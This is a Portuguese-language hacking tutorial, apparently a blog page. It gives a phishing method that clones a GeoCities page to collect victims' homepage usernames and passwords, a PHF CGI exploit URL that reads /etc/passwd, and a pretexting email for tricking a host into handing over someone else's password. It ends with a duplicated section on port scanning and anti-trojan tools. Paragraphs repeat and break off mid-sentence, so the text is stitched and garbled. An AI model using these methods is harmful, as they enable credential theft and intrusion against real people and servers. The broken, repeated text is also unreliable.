Nesse formulário o cara terá que colocar o user e a senha da HP, o endereço e etc.... Para o cara "receber" os megas ele terá que enviar o formulário. Para isso ela deverá clicar em algum botão de envio, normalmente um botão que fica escrito "submit" Quando a pessoa clica no botão submit formulário é enviado para a geocities pois aquele botão tem um comando para enviar para a geocities.Então o que você terá que fazer é mudar o comando. Em vez do formulário ser enviado para a geocities esse formulário vai ser enviado para o seu e-mail. Para isso você terá que editar a pagina da geocities. No lugar que t em escrito:
ATAQUE VIA -BROWSER
O ataque via browser é com certeza o modo mais simples de se obter o arquivo passwd. É tão simples que você não precisa saber nada!
A única coisa que você tem que fazer é abrir seu browser e colocar uma URL.
Porém esse método tem 80% de chance de não funcionar! Mas não custa nada tentar
A maioria dos servidores já acharam o bug e concertaram.
Só colocar essa URL no location do seu browser :
http://Endereço_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Apenas isso e pronto!
HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1)
Alguns servidores de home page tipo a geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home pages no ar. Há um modo bem simples de se obter a senha de home pages que estão nesses servidores.
Tudo que voce tem que fazer é mandar um e-mail pedindo
pra eles te mandarem a senha da home page.
Mas não mande um e-mail estúpido tipo : "por favor me mandem a senha".
Façam algo mais convincente e de preferencia em inglês. Pegue todas as informações da HP possíveis.
E faça do tipo :
"Mês passado eu me cadastrei no serviço de vocês e recebi uma senha e um user name e meu endereço . Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é : "user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem."
Companhias como a geocities são muito ocupadas pra ficar verificando se é verdade eu não!
Provavelmente eles irao acreditar e em 2 semanas(mais ou menos) você receberá a senha no seu e-mail... crie uma conta de e-mail anonimo com nome@hotmail.com
HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2)
Outro modo de hackear esse tipo de home pages é enganar o próprio webmaster da HP! Esse modo funciona normalmente com webmasters idiotas que não sabem muito coisa e nem percebem que eles mesmos estão dando a senha para o hackeador. É outro método bem simples mas um pouco mais demorado. O que você tem que fazer é criar uma pagina onde você finge que é a geocities que esta dando mais megas para HP's! Ou seja, você terá que criar uma página imitando a geocities! Faça uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formulário pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espaço pra HP!!!
Nesse formulário o cara terá que colocar o user e a senha da HP, o endereço e etc.... Para o cara "receber" os megas ele terá que enviar o formulário. Para isso ela deverá clicar em algum botão de envio, normalmente um botão que fica escrito "submit" Quando a pessoa clica no botão submit formulário é enviado para a geocities pois aquele botão tem um comando para enviar para a geocities.Então o que você terá que fazer é mudar o comando. Em vez do formulário ser enviado para a geocities esse formulário vai ser enviado para o seu e-mail. Para isso você terá que editar a pagina da geocities. No lugar que t em escrito:
EATRATÉGIA DE SEGURANÇA
Essa estratégia consiste em usar programas de segurança dos mais variados para proteger suas portas de comunicações,
protegendo simultaneamente de nukes, invasões entre outros ataques...
- Você precisará ter os seguintes programas: Xô Bobus 99, NOBO versão 1.3a, 7th Sphere PortScan 1.1.
- Siga as instruções abaixo:
a) Já conectado, vá em Iniciar >> Executar >> E digite: C:\WINDOWS\Ipconfig. Aí vai aparecer os número de seu IP.
b) Agora abra o 7th Sphere PortScan 1.1 e no quadro 'Scan' coloque o número de seu IP e clique em 'Start'. Aí o programa
vai mostrar todas as suas portas abertas onde um hacker poderia aproveitar para te nukar, invadir e assim vai...
c) Instale o Xô Bobus e regule ele para proteger o maior número possível de portas de comunicação.
d) No Xô Bobus, onde diz: Porta Extra, ative esta opção e regule para proteger a sua porta 80.
e) Pode ser que o 7th Sphere PortScan 1.1 tenha indicado mais uma porta aberta que não está entre as protegidas pelo Xô
Bobus, aí você vai proteger ela com o NOBO.
f) Vá no Xô Bobus e clique em 'Remover Trojans' e ele vai procurar por trojans se encontrar vai eliminar. Depois clique em
'Vacinar', e o Xô Bobus vai vacinar seu computador contra os principais programas de Invasão.
protegendo simultaneamente de nukes, invasões entre outros ataques...
- Você precisará ter os seguintes programas: Xô Bobus 99, NOBO versão 1.3a, 7th Sphere PortScan 1.1.
- Siga as instruções abaixo:
a) Já conectado, vá em Iniciar >> Executar >> E digite: C:\WINDOWS\Ipconfig. Aí vai aparecer os número de seu IP.
b) Agora abra o 7th Sphere PortScan 1.1 e no quadro 'Scan' coloque o número de seu IP e clique em 'Start'. Aí o programa
vai mostrar todas as suas portas abertas onde um hacker poderia aproveitar para te nukar, invadir e assim vai...
c) Instale o Xô Bobus e regule ele para proteger o maior número possível de portas de comunicação.
d) No Xô Bobus, onde diz: Porta Extra, ative esta opção e regule para proteger a sua porta 80.
e) Pode ser que o 7th Sphere PortScan 1.1 tenha indicado mais uma porta aberta que não está entre as protegidas pelo Xô
Bobus, aí você vai proteger ela com o NOBO.
f) Vá no Xô Bobus e clique em 'Remover Trojans' e ele vai procurar por trojans se encontrar vai eliminar. Depois clique em
'Vacinar', e o Xô Bobus vai vacinar seu computador contra os principais programas de Invasão.
Assinar:
Postagens (Atom)